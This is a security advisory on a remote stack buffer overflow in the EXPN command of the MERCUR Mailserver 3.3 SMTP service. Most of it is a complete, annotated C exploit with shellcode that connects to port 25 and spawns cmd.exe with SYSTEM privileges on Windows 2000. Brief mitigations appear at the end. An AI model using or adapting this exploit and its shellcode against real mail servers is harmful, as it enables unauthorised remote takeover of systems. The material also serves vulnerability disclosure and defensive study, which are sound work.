COMMAND

    Mercur

SYSTEMS AFFECTED

    Mercur Mailserver 3.3

PROBLEM

    Martin Rakhmanoff found the following.  By default the SMTP server is
    installed to run under the LocalSystem  account.  This means that an
    attacker who gains  control over the product's execution flow  can do
    anything on the target system:  the overflow described below  is not
    confined by a restricted service account but yields SYSTEM privileges.

    Particularly,  the MERCUR SMTP-Service  (binary MCRSMTP.EXE,  version
    3.30.3.0) suffers from a stack-based buffer overflow in its  handling
    of the EXPN command, illustrated below:

        220 MERCUR SMTP-Server (v3.30.03 Unregistered)
        for Windows NT ready at Thu, 15 Feb 2001  03:55:34 -0800
        EXPN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        
        
        Connection to host lost.
        
        C:\>

    Submitting an EXPN argument that carries, at positions 133, 134, 135
    and 136 (counted from 1 after the "EXPN " prefix, i.e. sploit[137..140]
    in the exploit below), the address the  processor should jump to,  in
    little-endian byte order, gives full control over the machine.  Since
    the service runs as LocalSystem, that control comes with SYSTEM rights.

    Here is an exploit that runs an instance of cmd.exe on the target host.
    Note that the return address  and the two absolute API addresses  that
    are embedded in the shellcode  are tied to the tested build (Windows
    2000 Advanced Server SP1); on any other build they must be re-resolved
    first, otherwise the attempt will most likely only crash the service:

    /*
     MERCUR Mailserver 3.3 Remote Buffer Overflow
     Tested on Win2K AS SP1 with MERCUR SMTP-Server v3.30.03
     Martin Rakhmanoff
     martin@direct.spb.ru
    */
    
    #include <winsock2.h>
    #include <stdio.h>
    #include <string.h>
    
    /*
     * Payload executed once control reaches the overwritten return address.
     * 32 real bytes of code + data; sizeof(shellcode) is 33 because of the
     * implicit NUL terminator (the 173-byte send in main() stops short of it).
     *
     * Decoded as 32-bit x86:
     *   8B C4             mov  eax, esp
     *   83 C0 17          add  eax, 0x17        ; offset of "cmd.exe" below --
     *                                           ; only correct if esp points at
     *                                           ; the start of this buffer on
     *                                           ; entry (TODO confirm)
     *   50                push eax              ; pointer to "cmd.exe"
     *   B8 0E B5 E9 77    mov  eax, 0x77E9B50E  ; absolute address, see NOTE
     *   FF D0             call eax
     *   33 DB             xor  ebx, ebx
     *   53                push ebx              ; argument 0
     *   B8 2D F3 E8 77    mov  eax, 0x77E8F32D  ; absolute address, see NOTE
     *   FF D0             call eax
     *   63 6D 64 2E 65 78 65 0D 0A              ; "cmd.exe\r\n"
     *
     * NOTE(review): 0x77E9B50E and 0x77E8F32D are hard-coded addresses for
     * the tested Windows 2000 AS SP1 system (presumably kernel32 exports --
     * not verifiable from this file).  They must be re-resolved for any other
     * Windows build; otherwise the payload faults instead of running cmd.exe.
     */
    char shellcode[] =
     "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77\xFF\xD0\x33\xDB\x53"
     "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64\x2E\x65\x78\x65\x0D\x0A";
    /*
     * Debugging aid from the original author: in SoftICE, a breakpoint at
     * 001b:00418b65 (bpx 001b:00418b65) stops at the point where the saved
     * return address is popped into eip -- i.e. where the overwritten value
     * takes effect.
     */
    
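    /*
     * Program entry point: connects to the target's SMTP port and sends the
     * overflowing EXPN command.
     *
     * Usage:  sploit [host]
     *   host   target to attack; defaults to "arena", the name the original
     *          version of this program had hard-coded.
     *
     * Returns 0 when the whole payload was handed to the socket, 1 on any
     * failure (Winsock init, name lookup, socket, connect, recv, send).
     * A successful send does not prove the overflow worked: the server
     * drops the connection either way.
     */
    int main(int argc, char * argv[]){

        /* Layout of the 173-byte payload:
         * "EXPN " + 132 filler bytes + 4-byte return address + shellcode. */
        enum {
            PREFIX_LEN = 5,    /* length of "EXPN "                          */
            RET_OFFSET = 137,  /* 1-based positions 133..136 of the argument */
            SC_OFFSET  = 141,  /* first shellcode byte (RET_OFFSET + 4)      */
            SMTP_PORT  = 25
        };
        /* sizeof shellcode counts the terminating NUL, which is not sent. */
        const size_t payload_len = SC_OFFSET + sizeof shellcode - 1;
        const char *host = (argc > 1) ? argv[1] : "arena";

        unsigned char sploit[512];
        char buffer[512];
        WSADATA wsaData;
        SOCKET sock = INVALID_SOCKET;
        struct sockaddr_in server;
        struct hostent *hp;
        int rc = 1;

        if (payload_len > sizeof sploit) {
            fprintf(stderr, "shellcode too large for payload buffer\n");
            return 1;
        }

        if (WSAStartup(0x202, &wsaData) != 0) {
            fprintf(stderr, "WSAStartup failed\n");
            return 1;
        }

        hp = gethostbyname(host);
        /* h_length must match sin_addr exactly, or the memcpy would overrun. */
        if (hp == NULL || hp->h_addrtype != AF_INET ||
            (size_t)hp->h_length != sizeof server.sin_addr) {
            fprintf(stderr, "cannot resolve IPv4 address of %s\n", host);
            goto out;
        }
        memset(&server, 0, sizeof server);
        memcpy(&server.sin_addr, hp->h_addr, sizeof server.sin_addr);
        server.sin_family = AF_INET;
        server.sin_port = htons(SMTP_PORT);

        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock == INVALID_SOCKET) {
            fprintf(stderr, "socket() failed: %d\n", WSAGetLastError());
            goto out;
        }
        if (connect(sock, (struct sockaddr *)&server, sizeof server) == SOCKET_ERROR) {
            fprintf(stderr, "connect() to %s:%d failed: %d\n",
                    host, SMTP_PORT, WSAGetLastError());
            goto out;
        }

        /* Build the payload: filler everywhere, then the fixed fields. */
        memset(sploit, 0x41, sizeof sploit);
        memcpy(sploit, "EXPN ", PREFIX_LEN);

        /* Return address 0x77E8898B, little-endian.  NOTE(review): the
         * original listing annotated this field as 77E87D8B while emitting
         * the bytes 8B 89 E8 77 (= 0x77E8898B).  The bytes are kept, since
         * they are what was actually tested; only the annotation is fixed. */
        sploit[RET_OFFSET + 0] = 0x8B;
        sploit[RET_OFFSET + 1] = 0x89;
        sploit[RET_OFFSET + 2] = 0xE8;
        sploit[RET_OFFSET + 3] = 0x77;

        memcpy(sploit + SC_OFFSET, shellcode, sizeof shellcode - 1);

        /* The server speaks first (220 banner); wait for it before sending. */
        if (recv(sock, buffer, sizeof buffer, 0) <= 0) {
            fprintf(stderr, "no banner received from %s\n", host);
            goto out;
        }
        if (send(sock, (const char *)sploit, (int)payload_len, 0) != (int)payload_len) {
            fprintf(stderr, "send() failed: %d\n", WSAGetLastError());
            goto out;
        }
        rc = 0;

    out:
        if (sock != INVALID_SOCKET) {
            closesocket(sock);
        }
        WSACleanup();
        return rc;
    }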

SOLUTION

    The vendor was notified but, at the time of writing, had taken no
    action.  Until a fix is available, the practical mitigations are to run
    the MERCUR services under a dedicated low-privilege account instead of
    LocalSystem (so that a successful overflow does not yield SYSTEM) and to
    restrict which hosts can reach port 25, since the EXPN command is
    reachable immediately after the banner, before any authentication.